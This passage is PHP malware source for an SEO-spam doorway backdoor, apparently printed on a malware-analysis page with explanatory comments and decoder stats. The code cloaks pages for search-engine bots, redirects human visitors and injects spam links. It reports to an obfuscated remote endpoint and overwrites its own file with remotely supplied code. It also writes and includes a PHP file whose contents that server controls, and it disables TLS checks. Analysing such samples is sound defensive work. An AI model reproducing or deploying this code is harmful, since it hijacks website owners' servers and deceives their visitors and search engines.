$params = "rid=" . $this->rid . "&action=getpage&keyword=" . urlencode($this->currentKeyword) . "&hash=" . $this->currentHash . "&url=" . urlencode($this->currentUrl) . "&postpass=" . $postPass;
$page = $this->goPost($this->au, $params);
$page = json_decode($page);
if (!empty($page)) {
if ($page->md5 !== md5($page->content)) {
return "";
}
$page = $page->content;
if (
!stripos("qqq" . $page, "<body")
|| !stripos("qqq" . $page, "<html")
) {
return "";
}
$this->fileAction($this->cacheDir . "/" . $this->currentHash, "w+", gzdeflate($page));
return $page;
}
return "";
}
private function showLinks()
{
$page = $this->goPost($this->currentUrl, "", true);
if (empty($page)) {
return "";
}
$page = $this->placeLinks($page);
if (empty($page)) {
return "";
}
return $page;
}
private function placeLinks($page)
{
$links = null;
$save = true;
if (file_exists($this->cacheDir . "/" . $this->currentHash)) {
$links = file_get_contents($this->cacheDir . "/" . $this->currentHash);
$links = json_decode($links);
$save = false;
}
if (empty($links)) {
$links = $this->getRandLinks();
}
if (empty($links)) {
return false;
}
if ($save === true) {
$this->fileAction($this->cacheDir . "/" . $this->currentHash, "w+", json_encode($links));
}
return preg_replace("/(<body.*>)/", "\$1" . implode($links), $page, 1);
}
private function pageActions()
{
if ($this->isDoor === true) {
$page = $this->showPage();
if ($this->isBot === false && !empty($this->redirCode)) {
echo $this->redirCode;
die();
}
if (!empty($page)) {
echo $page;
die();
}
} else {
if ($this->isBot === true) {
$page = $this->showLinks();
if (!empty($page)) {
echo $page;
die();
}
}
}
}
private function redirActions()
{
if ($this->redirType === "kt" && $this->isDoor === true) {
$ktRes = $this->goPost($this->redirUrl, "token=" . $this->redirCode . "&log=1&info=1&user_agent=" . urlencode($this->ua) . "&ip=" . $this->ip . "&keyword=" . urlencode($this->currentKeyword) . "&referrer=" . urlencode($this->ref) . "&source=" . urlencode($this->currentUrl));
$ktRes = json_decode($ktRes);
if (!empty($ktRes->body)) {
$this->redirCode = $ktRes->body;
} else {
$this->redirCode = "";
}
if ($ktRes->info->is_bot === true || $ktRes->body == "bot") {
$this->isBot = true;
}
} else {
if (!empty($this->redirCode)) {
$this->redirCode = str_ireplace("[REFERER]", $this->ref, $this->redirCode);
$this->redirCode = str_ireplace("[DOMAIN]", $_SERVER["SERVER_NAME"], $this->redirCode);
$this->redirCode = str_ireplace("[CURURL]", $this->currentUrl, $this->redirCode);
$this->redirCode = str_ireplace("[KEYWORD]", $this->currentKeyword, $this->redirCode);
$this->redirCode = str_ireplace("[DEFISKEY]", str_ireplace(" ", "-", $this->currentKeyword), $this->redirCode);
$this->redirCode = str_ireplace("[PLUSKEY]", str_ireplace(" ", "+", $this->currentKeyword), $this->redirCode);
}
$is_bot = "";
$user_agent_to_filter = array('#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#', '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i', '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i', '#www\.cys\.ru#i', '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i', '#CFNetwork#i', '#ConveraCrawler#i', '#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i', '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i', '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i', '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i', '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i', '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i', '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i', '#Yandex#i', '#Yanga#i', '#Yeti#i', '#msnbot#i', '#spider#i', '#yahoo#i', '#jeeves#i', '#googlebot#i', '#altavista#i', '#scooter#i', '#av\s*fetch#i', '#asterias#i', '#spiderthread revision#i', '#sqworm#i', '#ask#i', '#lycos.spider#i', '#infoseek sidewinder#i', '#ultraseek#i', '#polybot#i', '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i', '#charlotte#i', '#bingbot#i');
$stop_ips_masks = array("66\.249\.[6-9][0-9]\.[0-9]", "74\.125\.[0-9]\.[0-9]", "65\.5[2-5]\.[0-9]\.[0-9]", "74\.6\.[0-9]\.[0-9]", "67\.195\.[0-9]\.[0-9]", "72\.30\.[0-9]\.[0-9]", "38\.[0-9]\.[0-9]\.[0-9]", "93\.172\.94\.227", "212\.100\.250\.218", "71\.165\.223\.134", "70\.91\.180\.25", "65\.93\.62\.242", "74\.193\.246\.129", "213\.144\.15\.38", "195\.92\.229\.2", "70\.50\.189\.191", "218\.28\.88\.99", "165\.160\.2\.20", "89\.122\.224\.230", "66\.230\.175\.124", "218\.18\.174\.27", "65\.33\.87\.94", "67\.210\.111\.241", "81\.135\.175\.70", "64\.69\.34\.134", "89\.149\.253\.169", "104\.132\.8\.69");
foreach ($stop_ips_masks as $k => $v) {
if (preg_match('#^' . $v . '$#', $this->ip)) {
$is_bot = "bot";
}
}
if (empty($is_bot) && strpos("qqq" . preg_replace($user_agent_to_filter, '-ANGRYBOT-', $this->ua), '-ANGRYBOT-')) {
$is_bot = true;
}
if ($is_bot == true) {
$this->isBot = true;
}
}
}
private function isDoor()
{
$handle = fopen($this->uFile, "r");
$secondCurrentUrl = str_ireplace("http://", "", $this->currentUrl);
$secondCurrentUrl = str_ireplace("https://", "", $secondCurrentUrl);
$secondCurrentUrl = str_ireplace("www.", "", $secondCurrentUrl);
$secondHash = $this->makeHash($secondCurrentUrl, true);
// var_dump($this->currentUrl, $secondCurrentUrl, $secondHash, file($this->uFile));
while (!feof($handle)) {
$oneLine = fgets($handle);
$oneLine = trim($oneLine);
$oneLine = json_decode($oneLine);
if (!empty($oneLine)) {
if ($oneLine->hash === $this->currentHash || $oneLine->hash === $secondHash) {
fclose($handle);
if(!empty($oneLine->keyword)){
$this->currentKeyword = urldecode($oneLine->keyword);
$this->isDoor = true;
}
return true;
}
}
}
fclose($handle);
return false;
}
private function checkRequest()
{
if (!empty($this->post["check"])) {
$result = [
"result" => 1
];
if (!empty($this->post["postpass"])) {
if (!$this->checkPostPass()) {
return false;
}
if ($this->ver !== $this->post["ver"]) {
if ($this->renewClient()) {
$result["renew"] = 1;
}
}
if (file_exists($this->rFile) && !empty($this->post["redmd5"]) && $this->post["redmd5"] !== md5(file_get_contents($this->rFile))) {
if ($this->changeRedirect()) {
$result["changedred"] = 1;
}
}
$hostData = $this->getHostData();
if(!empty($hostData)){
$result["hostdata"] = $hostData;
}
}
header('Content-Type: application/json; charset=utf-8');
echo json_encode($result);
die();
}
}
private function getHostData()
{
$result = [];
if (function_exists("execc")) {
$uname = "";
$hostname = "";
$result["uname"] = $uname;
$result["hostname"] = $hostname;
}
return $result;
}
private function changeRedirect()
{
$params = "rid=" . $this->rid . "&action=checkredirect&postpass=" . $this->postPass;
$redirect = $this->goPost($this->au, $params);
$data = json_decode($redirect);
if (empty($data)) {
return false;
}
if ($data->md5 === md5($data->body)) {
$this->fileAction($this->rFile, "w+", $data->body);
return true;
}
return false;
}
/**
 * Self-update: downloads a body from the remote endpoint (action=renew) and overwrites
 * __FILE__ with it. Whatever the endpoint returns becomes the PHP code executed on the next
 * request, so the code on disk can differ from this sample; a static file hash identifies
 * one version only.
 *
 * @return bool true when the file was overwritten.
 */
private function renewClient()
{
$params = "rid=" . $this->rid . "&action=renew&postpass=" . $this->postPass;
$page = $this->goPost($this->au, $params);
$data = json_decode($page);
if (empty($data)) {
return false;
}
// The md5 is delivered with the body and goPost() disables TLS verification, so this check
// only rules out a damaged download; it does not establish who sent the code.
if ($data->md5 === md5($data->body)) {
$this->fileAction(__FILE__, "w+", $data->body);
return true;
}
return false;
}
private function checkRedir()
{
if (file_exists($this->rFile)) {
$redirCode = file_get_contents($this->rFile);
$redirCode = json_decode($redirCode);
if (empty($redirCode)) {
return false;
}
if (empty($redirCode->url) || empty($redirCode->data)) {
return false;
}
if ($redirCode->type === "kt") {
$this->redirType = "kt";
}
$this->redirUrl = $this->dcdAu($redirCode->url);
$this->redirCode = $redirCode->data;
}
return false;
}
private function setVars()
{
$this->au = $this->dcdAu($this->au);
if (empty($this->au)) {
return false;
}
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$this->ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (!empty($_SERVER['REMOTE_ADDR'])) {
$this->ip = $_SERVER['REMOTE_ADDR'];
} else {
$this->ip = "";
}
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$this->ua = $_SERVER['HTTP_USER_AGENT'];
} else {
$this->ua = "";
}
if(
stripos("qqq".$this->ua, "mj12bot.com")
|| stripos("qqq".$this->ua, "seostar.co/robot")
|| stripos("qqq".$this->ua, "AhrefsBot")
|| stripos("qqq".$this->ua, "DataForSeoBot")
|| stripos("qqq".$this->ua, "The Knowledge AI")
|| stripos("qqq".$this->ua, "SiteLockSpider")
) {
return false;
}
if (!empty($_SERVER['HTTP_REFERER'])) {
$this->ref = $_SERVER['HTTP_REFERER'];
} else {
$this->ref = "";
}
$this->post = $_POST;
$this->rid = md5(str_ireplace("www.", "", strtolower($_SERVER['SERVER_NAME'])));
if (isset($_SERVER['HTTPS'])) {
$this->protocol = "https://";
}
$this->currentUrl = $this->protocol . strtolower($_SERVER['SERVER_NAME']) . strtolower($_SERVER['REQUEST_URI']);
$this->currentUrl = rtrim($this->currentUrl, "/");
$this->currentUrl = urldecode($this->currentUrl);
$this->currentHash = $this->makeHash($this->currentUrl);
$this->cacheDir = dirname(__FILE__) . "/cache_w";
$this->checkFile = $this->cacheDir . "/check";
$this->pFile = $this->cacheDir . "/pfile.php";
$this->uFile = $this->cacheDir . "/ufile";
$this->rFile = $this->cacheDir . "/rfile";
return true;
}
private function saveRedirect($data)
{
$this->fileAction($this->rFile, "w+", json_encode($data));
}
private function install()
{
if (stripos("qqq" . $this->currentUrl, ".pdf") || stripos("qqq" . $this->currentUrl, ".xml") || stripos("qqq" . $this->currentUrl, ".pdf")) {
return false;
}
if (!file_exists($this->checkFile)) {
mkdir($this->cacheDir);
$this->fileAction($this->checkFile, "w+", time());
if (file_exists($this->checkFile)) {
$isSecure = "";
if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') {
$isSecure = "yes";
}
$params = "rid=" . $this->rid . "&action=install&url=" . $this->currentUrl . "&path=" . __FILE__."&ssl=".$isSecure;
$incomeData = $this->goPost($this->au, $params);
$incomeData = json_decode($incomeData);
$result = [
"type" => "error"
];
if (!empty($incomeData)) {
if (!empty($incomeData->postpass)) {
$this->savePass($incomeData->postpass);
}
if (!empty($incomeData->urls)) {
foreach ($incomeData->urls as $urlData) {
$toSave = [
"hash" => $this->makeHash($urlData->url),
"url" => urlencode($urlData->url),
"keyword" => urlencode($urlData->keyword)
];
$this->fileAction($this->uFile, "a+", json_encode($toSave) . "\n");
}
$result["type"] = "fromurls";
}
if (!empty($incomeData->redirect)) {
$this->saveRedirect($incomeData->redirect);
}
}
}
}
return true;
}
private function makeHash($string, $noStr = false)
{
$string = rtrim($string, "/");
if($noStr === false) {
$string = str_ireplace(
["http://", "https//", "www."],
"",
$string
);
}
return md5(urlencode($string));
}
/**
 * Sends an HTTP POST and returns the response body. Used for every call to the remote
 * endpoint and for the loopback fetch of the host's own pages.
 *
 * Observable on the network as outbound POSTs from the web server's PHP process carrying a
 * desktop-browser User-Agent (rUA()).
 *
 * @param string $url     Target URL.
 * @param string $params  URL-encoded form body; a trailing "&" is trimmed.
 * @param bool   $nocache When true, appends "<postVar>=yes" (i.e. nocache=yes).
 * @return string|bool Response body, or false on failure.
 */
public function goPost($url, $params, $nocache = false)
{
$params = rtrim($params, '&');
if ($nocache === true) {
$params .= "&" . $this->postVar . "=yes";
}
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $this->rUA());
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
// Passing a body via CURLOPT_POSTFIELDS makes the request a POST.
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
curl_setopt($ch, CURLOPT_TIMEOUT, 40);
// Certificate and host-name verification are both switched off: responses, including the
// code written by renewClient(), are accepted from any TLS peer.
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$output = curl_exec($ch);
curl_close($ch);
} else {
// Fallback without cURL: stream-context POST, no custom User-Agent and no timeout set here.
$output = file_get_contents($url, false, stream_context_create(array('http' => array('method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $params))));
}
return $output;
}
private function getRandLinks()
{
if (!file_exists($this->uFile)) {
return false;
}
$links = [];
$linesIndArr = array();
$n = 1;
$handle = fopen($this->uFile, "r");
while (!feof($handle)) {
if (fgets($handle) !== false) {
$linesIndArr[] = $n++;
}
}
fclose($handle);
$linesIndArr = $this->shArr($linesIndArr);
$linesIndArr = array_slice($linesIndArr, 0, rand(4, 6));
$i = 0;
$handle = fopen($this->uFile, "r");
while (!feof($handle)) {
if (count($links) == count($linesIndArr)) {
break;
}
$line = fgets($handle);
if ($line !== false && in_array($i, $linesIndArr)) {
$link = json_decode(trim($line));
if (!empty($link)) {
$link = "<a href='" . urldecode($link->url) . "'>" . urldecode($link->keyword) . "</a> ";
$links[] = $link;
}
}
$i++;
}
fclose($handle);
return $links;
}
function dcdAu($au)
{
$goodservurl = array();
foreach (str_split($au) as $onechar) {
if (is_numeric($onechar)) {
if ($onechar >= 3) {
$onechar = $onechar - 3;
} else {
$onechar = $onechar + 10 - 3;
}
}
$goodservurl[] = $onechar;
}
return urldecode(base64_decode(implode($goodservurl)));
}
/**
 * Persists the command password as a PHP file (cache_w/pfile.php) that later code include()s.
 *
 * $pass is taken from the install response and concatenated into a single-quoted PHP string
 * literal without escaping, so the remote side controls the contents of a file that is
 * executed by showPage() and checkPostPass().
 *
 * @param string $pass Password value from the install response.
 */
private function savePass($pass)
{
$this->fileAction($this->pFile, "w+", "<?php \$postPass = '" . $pass . "'; ?>");
}
private function rUA()
{
$uas = array("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)");
$uas = $this->shArr($uas);
return $uas[0];
}
private function shArr($arr)
{
srand((float)microtime() * 1000000);
shuffle($arr);
return $arr;
}
/**
 * Authenticates a POST command: the "postpass" field must equal the $postPass value defined
 * by including cache_w/pfile.php. On success the value is kept in $this->postPass for the
 * follow-up calls to the remote endpoint.
 *
 * @return bool true only when a non-empty postpass was POSTed and matches the stored one.
 */
private function checkPostPass()
{
if (empty($this->post["postpass"])) {
return false;
}
if (file_exists($this->pFile)) {
// include() executes pfile.php; errors are suppressed with "@".
@include($this->pFile);
if (!empty($postPass)) {
// Plain === string comparison (not hash_equals()).
if ($this->post["postpass"] === $postPass) {
$this->postPass = $postPass;
return true;
}
}
}
return false;
}
private function randString($length)
{
$str = "";
$chars = "abcdefghijklmnopqrstuvwxyz0123456789";
$size = strlen($chars);
for ($i = 0; $i < $length; $i++) {
$str .= $chars[rand(0, $size - 1)];
}
return $str;
}
private function fileAction($path, $mode, $data)
{
$fod = fopen($path, $mode);
if (!$fod) {
return false;
}
fwrite($fod, $data);
fclose($fod);
return true;
}
}
// Obfuscated remote endpoint. dcdAu() recovers it by shifting every digit down by 3 (mod 10),
// base64-decoding and URL-decoding; the decoded URL is the network indicator for this sample.
$au = "aHR3cCUzQSUyRiUyRndvcmxkdHJhZmZpY6JvdXRlLnRvcCUyRmZhcGQyJTJGYXBpJTJGd52yaw==";
// Instantiation is the trigger: the constructor runs the full flow on every request.
new CacheModuleW($au);
Function Calls
None |
Stats
MD5 | 114aaf73d9af5bc34051a2b9f77bf7aa |
Eval Count | 0 |
Decode Time | 84 ms |